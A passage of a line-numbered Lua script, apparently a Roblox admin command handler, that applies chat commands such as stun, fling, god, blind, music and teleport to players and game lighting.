  1254. end
  1255.  
  1256. if Cmd.Text:lower():sub(1,5) == "stun " then
  1257. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1258. for i, v in pairs(plrz) do
  1259. coroutine.resume(coroutine.create(function()
  1260. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1261. v.Character.Humanoid.PlatformStand = true
  1262. end
  1263. end))
  1264. end
  1265. end
  1266.  
  1267. if Cmd.Text:lower():sub(1,7) == "unstun " then
  1268. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1269. for i, v in pairs(plrz) do
  1270. coroutine.resume(coroutine.create(function()
  1271. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1272. v.Character.Humanoid.PlatformStand = false
  1273. end
  1274. end))
  1275. end
  1276. end
  1277.  
  1278. if Cmd.Text:lower():sub(1,5) == "jump " then
  1279. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1280. for i, v in pairs(plrz) do
  1281. coroutine.resume(coroutine.create(function()
  1282. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1283. v.Character.Humanoid.Jump = true
  1284. end
  1285. end))
  1286. end
  1287. end
  1288.  
  1289. if Cmd.Text:lower():sub(1,4) == "sit " then
  1290. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5))
  1291. for i, v in pairs(plrz) do
  1292. coroutine.resume(coroutine.create(function()
  1293. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1294. v.Character.Humanoid.Sit = true
  1295. end
  1296. end))
  1297. end
  1298. end
  1299.  
  1300. if Cmd.Text:lower():sub(1,10) == "invisible " then
  1301. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11))
  1302. for i, v in pairs(plrz) do
  1303. coroutine.resume(coroutine.create(function()
  1304. if v and v.Character then
  1305. for a, obj in pairs(v.Character:children()) do
  1306. if obj:IsA("BasePart") then obj.Transparency = 1 if obj:findFirstChild("face") then obj.face.Transparency = 1 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 1 end
  1307. end
  1308. end
  1309. end))
  1310. end
  1311. end
  1312.  
  1313. if Cmd.Text:lower():sub(1,8) == "visible " then
  1314. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1315. for i, v in pairs(plrz) do
  1316. coroutine.resume(coroutine.create(function()
  1317. if v and v.Character then
  1318. for a, obj in pairs(v.Character:children()) do
  1319. if obj:IsA("BasePart") then obj.Transparency = 0 if obj:findFirstChild("face") then obj.face.Transparency = 0 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 0 end
  1320. end
  1321. end
  1322. end))
  1323. end
  1324. end
  1325.  
  1326.  
  1327.  
  1328. if Cmd.Text:lower():sub(1,5) == "fire " then
  1329. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1330. for i, v in pairs(plrz) do
  1331. coroutine.resume(coroutine.create(function()
  1332. if v and v.Character and v.Character:findFirstChild("Torso") then
  1333. local cl = Instance.new("Fire", v.Character.Torso)
  1334. end
  1335. end))
  1336. end
  1337. end
  1338.  
  1339. if Cmd.Text:lower():sub(1,7) == "unfire " then
  1340. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1341. for i, v in pairs(plrz) do
  1342. coroutine.resume(coroutine.create(function()
  1343. if v and v.Character and v.Character:findFirstChild("Torso") then
  1344. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Fire") then cl:Destroy() end end
  1345. end
  1346. end))
  1347. end
  1348. end
  1349.  
  1350. if Cmd.Text:lower():sub(1,6) == "smoke " then
  1351. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1352. for i, v in pairs(plrz) do
  1353. coroutine.resume(coroutine.create(function()
  1354. if v and v.Character and v.Character:findFirstChild("Torso") then
  1355. local cl = Instance.new("Smoke", v.Character.Torso)
  1356. end
  1357. end))
  1358. end
  1359. end
  1360.  
  1361. if Cmd.Text:lower():sub(1,8) == "unsmoke " then
  1362. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1363. for i, v in pairs(plrz) do
  1364. coroutine.resume(coroutine.create(function()
  1365. if v and v.Character and v.Character:findFirstChild("Torso") then
  1366. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Smoke") then cl:Destroy() end end
  1367. end
  1368. end))
  1369. end
  1370. end
  1371.  
  1372. if Cmd.Text:lower():sub(1,9) == "sparkles " then
  1373. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1374. for i, v in pairs(plrz) do
  1375. coroutine.resume(coroutine.create(function()
  1376. if v and v.Character and v.Character:findFirstChild("Torso") then
  1377. local cl = Instance.new("Sparkles", v.Character.Torso)
  1378. end
  1379. end))
  1380. end
  1381. end
  1382.  
  1383. if Cmd.Text:lower():sub(1,11) == "unsparkles " then
  1384. local plrz = GetPlr(plr, Cmd.Text:lower():sub(12))
  1385. for i, v in pairs(plrz) do
  1386. coroutine.resume(coroutine.create(function()
  1387. if v and v.Character and v.Character:findFirstChild("Torso") then
  1388. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Sparkles") then cl:Destroy() end end
  1389. end
  1390. end))
  1391. end
  1392. end
  1393.  
  1394. if Cmd.Text:lower():sub(1,3) == "ff " then
  1395. local plrz = GetPlr(plr, Cmd.Text:lower():sub(4))
  1396. for i, v in pairs(plrz) do
  1397. coroutine.resume(coroutine.create(function()
  1398. if v and v.Character then Instance.new("ForceField", v.Character) end
  1399. end))
  1400. end
  1401. end
  1402.  
  1403. if Cmd.Text:lower():sub(1,5) == "unff " then
  1404. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1405. for i, v in pairs(plrz) do
  1406. coroutine.resume(coroutine.create(function()
  1407. if v and v.Character then
  1408. for z, cl in pairs(v.Character:children()) do if cl:IsA("ForceField") then cl:Destroy() end end
  1409. end
  1410. end))
  1411. end
  1412. end
  1413.  
  1414. if Cmd.Text:lower():sub(1,7) == "freeze " then
  1415. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1416. for i, v in pairs(plrz) do
  1417. coroutine.resume(coroutine.create(function()
  1418. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1419. for a, obj in pairs(v.Character:children()) do
  1420. if obj:IsA("BasePart") then obj.Anchored = true end v.Character.Humanoid.WalkSpeed = 0
  1421. end
  1422. end
  1423. end))
  1424. end
  1425. end
  1426.  
  1427. if Cmd.Text:lower():sub(1,5) == "thaw " then
  1428. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1429. for i, v in pairs(plrz) do
  1430. coroutine.resume(coroutine.create(function()
  1431. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1432. for a, obj in pairs(v.Character:children()) do
  1433. if obj:IsA("BasePart") then obj.Anchored = false end v.Character.Humanoid.WalkSpeed = 16
  1434. end
  1435. end
  1436. end))
  1437. end
  1438. end
  1439.  
  1440.  
  1441.  
  1442. if Cmd.Text:lower():sub(1,4) == "god " then
  1443. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5))
  1444. for i, v in pairs(plrz) do
  1445. coroutine.resume(coroutine.create(function()
  1446. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1447. v.Character.Humanoid.MaxHealth = math.huge
  1448. v.Character.Humanoid.Health = 9e9
  1449. end
  1450. end))
  1451. end
  1452. end
  1453.  
  1454. if Cmd.Text:lower():sub(1,6) == "ungod " then
  1455. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1456. for i, v in pairs(plrz) do
  1457. coroutine.resume(coroutine.create(function()
  1458. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1459. v.Character.Humanoid.MaxHealth = 100
  1460. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1461. end
  1462. end))
  1463. end
  1464. end
  1465.  
  1466. if Cmd.Text:lower():sub(1,8) == "ambient " then
  1467. local chk1 = Cmd.Text:lower():sub(9):find(" ") + 8
  1468. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1469. game.Lighting.Ambient = Color3.new(Cmd.Text:sub(9,chk1-1),Cmd.Text:sub(chk1+1,chk2-1),Cmd.Text:sub(chk2+1))
  1470. end
  1471.  
  1472. if Cmd.Text:lower():sub(1,11) == "brightness " then
  1473. game.Lighting.Brightness = Cmd.Text:sub(12)
  1474. end
  1475.  
  1476. if Cmd.Text:lower():sub(1,5) == "time " then
  1477. game.Lighting.TimeOfDay = Cmd.Text:sub(6)
  1478. end
  1479.  
  1480. if Cmd.Text:lower():sub(1,9) == "fogcolor " then
  1481. local chk1 = Cmd.Text:lower():sub(10):find(" ") + 9
  1482. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1483. game.Lighting.FogColor = Color3.new(Cmd.Text:sub(10,chk1-1),Cmd.Text:sub(chk1+1,chk2-1),Cmd.Text:sub(chk2+1))
  1484. end
  1485.  
  1486. if Cmd.Text:lower():sub(1,7) == "fogend " then
  1487. game.Lighting.FogEnd = Cmd.Text:sub(8)
  1488. end
  1489.  
  1490. if Cmd.Text:lower():sub(1,9) == "fogstart " then
  1491. game.Lighting.FogStart = Cmd.Text:sub(10)
  1492. end
  1493.  
  1494.  
  1495.  
  1496. if Cmd.Text:lower():sub(1,12) == "rtools " then
  1497. local plrz = GetPlr(plr, Cmd.Text:lower():sub(13))
  1498. for i, v in pairs(plrz) do
  1499. coroutine.resume(coroutine.create(function()
  1500. if v and v.Character and v:findFirstChild("Backpack") then
  1501. for a, tool in pairs(v.Character:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  1502. for a, tool in pairs(v.Backpack:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  1503. end
  1504. end))
  1505. end
  1506. end
  1507.  
  1508.  
  1509.  
  1510.  
  1511.  
  1512.  
  1513.  
  1514. if Cmd.Text:lower():sub(1,8) == "shealth " then
  1515. local chk1 = Cmd.Text:lower():sub(9):find(" ") + 8
  1516. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9,chk1-1))
  1517. for i, v in pairs(plrz) do
  1518. coroutine.resume(coroutine.create(function()
  1519. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1520. v.Character.Humanoid.MaxHealth = Cmd.Text:sub(chk1+1)
  1521. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1522. end
  1523. end))
  1524. end
  1525. end
  1526.  
  1527. if Cmd.Text:lower():sub(1,6) == "speed " then
  1528. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1529. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1530. for i, v in pairs(plrz) do
  1531. coroutine.resume(coroutine.create(function()
  1532. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1533. v.Character.Humanoid.WalkSpeed = Cmd.Text:sub(chk1+1)
  1534. end
  1535. end))
  1536. end
  1537. end
  1538.  
  1539.  
  1540. if Cmd.Text:lower():sub(1,10) == "teleplace " then
  1541. local chk1 = Cmd.Text:lower():sub(11):find(" ") + 10
  1542. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11,chk1-1))
  1543. for i, v in pairs(plrz) do
  1544. coroutine.resume(coroutine.create(function()
  1545. if v and v:findFirstChild("PlayerGui") then
  1546. local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[game:service("TeleportService"):Teleport(]] .. Cmd.Text:sub(chk1+1) .. ")" cl.Parent = v.PlayerGui cl.Disabled = false
  1547. end
  1548. end))
  1549. end
  1550. end
  1551.  
  1552. if Cmd.Text:lower():sub(1,3) == "tp " then
  1553. local chk1 = Cmd.Text:lower():sub(4):find(" ") + 3
  1554. local plrz = GetPlr(plr, Cmd.Text:lower():sub(4,chk1-1))
  1555. local plrz2 = GetPlr(plr, Cmd.Text:lower():sub(chk1+1))
  1556. for i, v in pairs(plrz) do
  1557. coroutine.resume(coroutine.create(function()
  1558. for i2, v2 in pairs(plrz2) do
  1559. if v and v2 and v.Character and v2.Character and v.Character:findFirstChild("Torso") and v2.Character:findFirstChild("Torso") then
  1560. v.Character.Torso.CFrame = v2.Character.Torso.CFrame + Vector3.new(math.random(-1,1),0,math.random(-1,1))
  1561. end
  1562. end
  1563. end))
  1564. end
  1565. end
  1566.  
  1567. if Cmd.Text:lower():sub(1,7) == "statchange " then
  1568. local chk1 = Cmd.Text:lower():sub(8):find(" ") + 7
  1569. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1570. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8,chk1-1))
  1571. for i, v in pairs(plrz) do
  1572. coroutine.resume(coroutine.create(function()
  1573. if v and v:findFirstChild("leaderstats") then
  1574. for a, st in pairs(v.leaderstats:children()) do
  1575. if st.Name:lower():find(Cmd.Text:sub(chk1+1,chk2-1)) == 1 then st.Value = Cmd.Text:sub(chk2+1) end
  1576. end
  1577. end
  1578. end))
  1579. end
  1580. end
  1581.  
  1582. if Cmd.Text:lower():sub(1,6) == "shirt " then
  1583. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1584. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1585. for i, v in pairs(plrz) do
  1586. coroutine.resume(coroutine.create(function()
  1587. if v and v.Character then
  1588. for i,v in pairs(v.Character:children()) do
  1589. if v:IsA("Shirt") then local cl = v:Clone() cl.Parent = v.Parent cl.ShirtTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1590. end
  1591. end
  1592. end))
  1593. end
  1594. end
  1595.  
  1596. if Cmd.Text:lower():sub(1,6) == "pants " then
  1597. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1598. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1599. for i, v in pairs(plrz) do
  1600. coroutine.resume(coroutine.create(function()
  1601. if v and v.Character then
  1602. for i,v in pairs(v.Character:children()) do
  1603. if v:IsA("Pants") then local cl = v:Clone() cl.Parent = v.Parent cl.PantsTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1604. end
  1605. end
  1606. end))
  1607. end
  1608. end
  1609.  
  1610. if Cmd.Text:lower():sub(1,5) == "gear " then
  1611. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1612. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6, chk1-1))
  1613. for i, v in pairs(plrz) do
  1614. if Cmd.Text:lower():sub(6) == "all" then return end
  1615. if Cmd.Text:lower():sub(6) == "others"then return end
  1616. if Cmd.Text:lower():sub(6) == "nonadmins" then return end
  1617. coroutine.resume(coroutine.create(function()
  1618. if v and v:findFirstChild("Backpack") then
  1619. local obj = game:service("InsertService"):LoadAsset(tonumber(Cmd.Text:sub(chk1+1)))
  1620. for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = v.Backpack end end
  1621. obj:Destroy()
  1622. end
  1623. end))
  1624. end
  1625. end
  1626.  
  1627. if Cmd.Text:lower():sub(1,5) == "face " then
  1628. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1629. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1630. for i, v in pairs(plrz) do
  1631. coroutine.resume(coroutine.create(function()
  1632. if v and v.Character and v.Character:findFirstChild("Head") and v.Character.Head:findFirstChild("face") then
  1633. v.Character.Head:findFirstChild("face").Texture = "http://www.roblox.com/asset/?id=" .. chk1
  1634. end
  1635. end))
  1636. end
  1637. end
  1638.  
  1639.  
  1640.  
  1641.  
  1642.  
  1643.  
  1644. if Cmd.Text:lower():sub(1,6) == "music " then
  1645. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1646. local id = Cmd.Text:sub(7)
  1647. local pitch = 1
  1648. if tostring(id):lower():find("caramell") then id = 2303479 end
  1649. if tostring(id):find("epic") then id = 27697743 pitch = 2.5 end
  1650. if tostring(id):find("rick") then id = 2027611 end
  1651. if tostring(id):find("halo") then id = 1034065 end
  1652. if tostring(id):find("pokemon") then id = 1372261 end
  1653. if tostring(id):find("cursed") then id = 1372257 end
  1654. if tostring(id):find("extreme") then id = 11420933 end
  1655. if tostring(id):find("awaken") then id = 27697277 end
  1656. if tostring(id):find("alone") then id = 27697392 end
  1657. if tostring(id):find("mario") then id = 1280470 end
  1658. if tostring(id):find("choir") then id = 1372258 end
  1659. if tostring(id):find("chrono") then id = 1280463 end
  1660. if tostring(id):find("dotr") then id = 11420922 end
  1661. if tostring(id):find("entertain") then id = 27697267 end
  1662. if tostring(id):find("fantasy") then id = 1280473 end
  1663. if tostring(id):find("final") then id = 1280414 end
  1664. if tostring(id):find("emblem") then id = 1372259 end
  1665. if tostring(id):find("flight") then id = 27697719 end
  1666. if tostring(id):find("banjo") then id = 27697298 end
  1667. if tostring(id):find("gothic") then id = 27697743 end
  1668. if tostring(id):find("hiphop") then id = 27697735 end
  1669. if tostring(id):find("intro") then id = 27697707 end
  1670. if tostring(id):find("mule") then id = 1077604 end
  1671. if tostring(id):find("film") then id = 27697713 end
  1672. if tostring(id):find("nezz") then id = 8610025 end
  1673. if tostring(id):find("angel") then id = 1372260 end
  1674. if tostring(id):find("resist") then id = 27697234 end
  1675. if tostring(id):find("schala") then id = 5985787 end
  1676. if tostring(id):find("organ") then id = 11231513 end
  1677. if tostring(id):find("tunnel") then id = 9650822 end
  1678. if tostring(id):find("spanish") then id = 5982975 end
  1679. if tostring(id):find("venom") then id = 1372262 end
  1680. if tostring(id):find("wind") then id = 1015394 end
  1681. if tostring(id):find("guitar") then id = 5986151 end
  1682. if tostring(id):find("fox") then id = 130797915 end
  1683. if tostring(id):find("gangnam") then id = 130844430 end
  1684. if tostring(id):find("nyan") then id = 130786686 end
  1685. if tostring(id):find("harlem") then id = 131154740 end
  1686. local s = Instance.new("Sound", game.Workspace) s.SoundId = "http://www.roblox.com/asset/?id=" .. id s.Volume = 1 s.Pitch = pitch s.Looped = true s.archivable = false repeat s:Play() wait(2.5) s:Stop() wait(.5) s:Play() until s.IsPlaying
  1687. end
  1688.  
  1689. if Cmd.Text:lower() == "stopmusic" then
  1690. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1691. end
  1692.  
  1693. if Cmd.Text:lower() == "musiclist" then
  1694. if plr.PlayerGui:findFirstChild("MUSICGUI") then return end
  1695. local scr, cmf, ent, num = ScrollGui() scr.Name = "MUSICGUI" scr.Parent = plr.PlayerGui
  1696. local list = {"caramell","epic","rick","halo","pokemon","cursed","extreme","awaken","alone","mario","choir","chrono","dotr","entertain","Harlem","Nyan","Fox","Gangnam","fantasy","final","emblem","flight","banjo","gothic","hiphop","intro","mule","film","nezz","angel","resist","schala","organ","tunnel","spanish","venom","wind","guitar"}
  1697. for i, v in pairs(list) do local cl = ent:Clone() cl.Parent = cmf cl.Text = v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  1698. end
  1699.  
  1700.  
  1701. if Cmd.Text:lower():sub(1,5) == "spin " then
  1702. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1703. for i, v in pairs(plrz) do
  1704. coroutine.resume(coroutine.create(function()
  1705. if v and v.Character and v.Character:findFirstChild("Torso") then
  1706. for i,v in pairs(v.Character.Torso:children()) do if v.Name == "SPINNER" then v:Destroy() end end
  1707. local torso = v.Character:findFirstChild("Torso")
  1708. local bg = Instance.new("BodyGyro", torso) bg.Name = "SPINNER" bg.maxTorque = Vector3.new(0,math.huge,0) bg.P = 11111 bg.cframe = torso.CFrame table.insert(objects,bg)
  1709. repeat wait(1/44) bg.cframe = bg.cframe * CFrame.Angles(0,math.rad(30),0)
  1710. until not bg or bg.Parent ~= torso
  1711. end
  1712. end))
  1713. end
  1714. end
  1715.  
  1716. if Cmd.Text:lower():sub(1,7) == "unspin " then
  1717. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1718. for i, v in pairs(plrz) do
  1719. coroutine.resume(coroutine.create(function()
  1720. if v and v.Character and v.Character:findFirstChild("Torso") then
  1721. for a,q in pairs(v.Character.Torso:children()) do if q.Name == "SPINNER" then q:Destroy() end end
  1722. end
  1723. end))
  1724. end
  1725. end
  1726.  
  1727.  
  1728.  
  1729. if Cmd.Text:lower():sub(1,8) == "bighead " then
  1730. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1731. for i, v in pairs(plrz) do
  1732. coroutine.resume(coroutine.create(function()
  1733. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(3,3,3) v.Character.Torso.Neck.C0 = CFrame.new(0,1.9,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1734. end))
  1735. end
  1736. end
  1737.  
  1738. if Cmd.Text:lower():sub(1,9) == "minihead " then
  1739. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1740. for i, v in pairs(plrz) do
  1741. coroutine.resume(coroutine.create(function()
  1742. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(.75,.75,.75) v.Character.Torso.Neck.C0 = CFrame.new(0,.8,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1743. end))
  1744. end
  1745. end
  1746.  
  1747. if Cmd.Text:lower():sub(1,6) == "fling " then
  1748. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1749. for i, v in pairs(plrz) do
  1750. coroutine.resume(coroutine.create(function()
  1751. if v and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  1752. local xran local zran
  1753. repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555
  1754. repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555
  1755. v.Character.Humanoid.Sit = true v.Character.Torso.Velocity = Vector3.new(0,0,0)
  1756. local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  1757. end
  1758. end))
  1759. end
  1760. end
  1761.  
  1762. if Cmd.Text:lower():sub(1,8) == "seizure " then
  1763. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1764. for i, v in pairs(plrz) do
  1765. coroutine.resume(coroutine.create(function()
  1766. if v and v.Character then
  1767. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(math.rad(90),0,0)
  1768. end
  1769. end))
  1770. end
  1771. end
  1772.  
  1773. if Cmd.Text:lower():sub(1,10) == "unseizure " then
  1774. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11))
  1775. for i, v in pairs(plrz) do
  1776. coroutine.resume(coroutine.create(function()
  1777. if v and v.Character then
  1778. for i,v in pairs(v.Character:children()) do if v.Name == "SeizureBase" then v:Destroy() end end
  1779. wait(.1) v.Character.Humanoid.PlatformStand = false
  1780. end
  1781. end))
  1782. end
  1783. end
  1784.  
  1785. if Cmd.Text:lower():sub(1,12) == "rlimbs " then
  1786. local plrz = GetPlr(plr, Cmd.Text:lower():sub(13))
  1787. for i, v in pairs(plrz) do
  1788. coroutine.resume(coroutine.create(function()
  1789. if v and v.Character then
  1790. for a, obj in pairs(v.Character:children()) do
  1791. if obj:IsA("BasePart") and (obj.Name:find("Leg") or obj.Name:find("Arm")) then obj:Destroy() end
  1792. end
  1793. end
  1794. end))
  1795. end
  1796. end
  1797.  
  1798.  
  1799. if Cmd.Text:lower():sub(1,5) == "char " then
  1800. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1801. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1802. for i, v in pairs(plrz) do
  1803. coroutine.resume(coroutine.create(function()
  1804. if v and v.Character then
  1805. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. Cmd.Text:sub(chk1+1)
  1806. v:LoadCharacter()
  1807. end
  1808. end))
  1809. end
  1810. end
  1811.  
  1812. if Cmd.Text:lower():sub(1,7) == "unchar " then
  1813. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1814. for i, v in pairs(plrz) do
  1815. coroutine.resume(coroutine.create(function()
  1816. if v and v.Character then
  1817. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. v.userId
  1818. v:LoadCharacter()
  1819. end
  1820. end))
  1821. end
  1822. end
  1823.  
  1824.  
  1825.  
  1826. if Cmd.Text:lower():sub(1,7) == "normal " then
  1827. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1828. for i, v in pairs(plrz) do
  1829. coroutine.resume(coroutine.create(function()
  1830. if v and v.Character and v.Character:findFirstChild("Torso") then
  1831. if v.Character:findFirstChild("Head") then v.Character.Head.Mesh.Scale = Vector3.new(1.25,1.25,1.25) end
  1832. if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  1833. if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  1834. v.Character.Torso.Transparency = 0
  1835. v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  1836. v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  1837. v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  1838. v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  1839. v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  1840. for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  1841. for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  1842. prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("White")
  1843. if prt.Name == "FAKETORSO" then prt:Destroy() end
  1844. elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor = BrickColor.new("White")
  1845. end end
  1846. end
  1847. end))
  1848. end
  1849. end
  1850.  
  1851. if Cmd.Text:lower():sub(1,7) == "trippy " then
  1852. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1853. for i, v in pairs(plrz) do
  1854. coroutine.resume(coroutine.create(function()
  1855. if v and v:findFirstChild("PlayerGui")then
  1856. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1857. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUITRIPPY"
  1858. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1859. local cl = script.ScriptBase:Clone() cl.Code.Value = [[repeat wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(math.random(255)/255,math.random(255)/255,math.random(255)/255) until nil]] cl.Parent = scr cl.Disabled = false
  1860. end
  1861. end))
  1862. end
  1863. end
  1864.  
  1865. if Cmd.Text:lower():sub(1,9) == "untrippy " then
  1866. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1867. for i, v in pairs(plrz) do
  1868. coroutine.resume(coroutine.create(function()
  1869. if v and v:findFirstChild("PlayerGui") then
  1870. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUITRIPPY" then g:Destroy() end end
  1871. end
  1872. end))
  1873. end
  1874. end
  1875.  
  1876.  
  1877. if Cmd.Text:lower():sub(1,6) == "blind " then
  1878. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1879. for i, v in pairs(plrz) do
  1880. coroutine.resume(coroutine.create(function()
  1881. if v and v:findFirstChild("PlayerGui") then
  1882. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1883. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUIBLIND"
  1884. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1885. end
  1886. end))
  1887. end
  1888. end
  1889.  
  1890. if Cmd.Text:lower():sub(1,8) == "unblind " then
  1891. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1892. for i, v in pairs(plrz) do
  1893. coroutine.resume(coroutine.create(function()
  1894. if v and v:findFirstChild("PlayerGui") then
  1895. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUIBLIND" then g:Destroy() end end
  1896. end
  1897. end))
  1898. end
  1899. end
  1900.  
  1901. if Cmd.Text:lower():sub(1,7) == "guifix " then
  1902. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1903. for i, v in pairs(plrz) do
  1904. coroutine.resume(coroutine.create(function()
  1905. if v and v:findFirstChild("PlayerGui") then
  1906. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1907. end
  1908. end))
  1909. end
  1910. end
  1911.  
  1912. if Cmd.Text:lower():sub(1,9) == "loopheal " then
  1913. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1914. for i, v in pairs(plrz) do
  1915. if v then
  1916. local cl = script.ScriptBase:Clone() cl.Name = "LoopHeal:"..v.Name cl.Code.Value = [[
  1917. local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  1918. repeat wait()
  1919. coroutine.resume(coroutine.create(function()
